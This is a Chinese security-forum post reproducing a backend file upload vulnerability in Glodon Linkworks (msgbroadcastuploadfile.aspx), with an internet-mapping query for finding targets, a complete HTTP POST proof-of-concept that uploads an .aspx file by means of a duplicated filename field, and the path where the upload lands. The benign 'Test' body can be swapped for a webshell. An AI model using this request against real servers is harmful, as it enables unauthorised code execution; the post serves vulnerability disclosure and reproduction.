问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Glodon Linkworks msgbroadcastuploadfile.aspx 后台文件上传漏洞
# Glodon Linkworks msgbroadcastuploadfile.aspx 后台文件上传漏洞 ## 漏洞描述 Glodon Linkworks msgbroadcastuploadfile.aspx 存在后台文件上传漏洞,攻击者通过SQL注入获取管理员信息...
Glodon Linkworks msgbroadcastuploadfile.aspx 后台文件上传漏洞 ===================================================== 漏洞描述 ---- Glodon Linkworks msgbroadcastuploadfile.aspx 存在后台文件上传漏洞,攻击者通过SQL注入获取管理员信息后,可以登陆发送请求包获取服务器权限 漏洞影响 ---- Glodon Linkworks 网络测绘 ---- web.body="/Services/Identification/" 漏洞复现 ---- 登陆页面 ![img](https://shs3.b.qianxin.com/butian_public/f60592611c5accf37d2a7a9db7b248757b967aa18bb00.jpg) GTP.IM.Services.Group.WebSite.GTP.IM.Services.Group 存在文件上传,上传后在当前目录 Upload下 ![img](https://shs3.b.qianxin.com/butian_public/f2894850f44e5a0233bfc87ed4798f650931427f02bb7.jpg) 通过SQL注入获取管理员账号密码后登陆后台上传文件,验证POC ```php POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj Cookie: 0_styleName=styleA ------WebKitFormBoundaryFfJZ4PlAZBixjELj Content-Disposition: form-data; filename="1.aspx";filename="1.jpg" Content-Type: application/text Test ------WebKitFormBoundaryFfJZ4PlAZBixjELj-- ``` ![img](https://shs3.b.qianxin.com/butian_public/f629470c8acbc4b63503bd1ecd9a4adb17af4d3a2e383.jpg) ```php /GTP/IM/Services/Group/Upload/xxx-xxx-test.aspx ``` ![img](https://shs3.b.qianxin.com/butian_public/f1474868648b6eb30141d8f00da304d6e9d2127f71d7d.jpg)
发表于 2024-07-12 18:46:04
阅读 ( 1000 )
分类:
Web应用
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!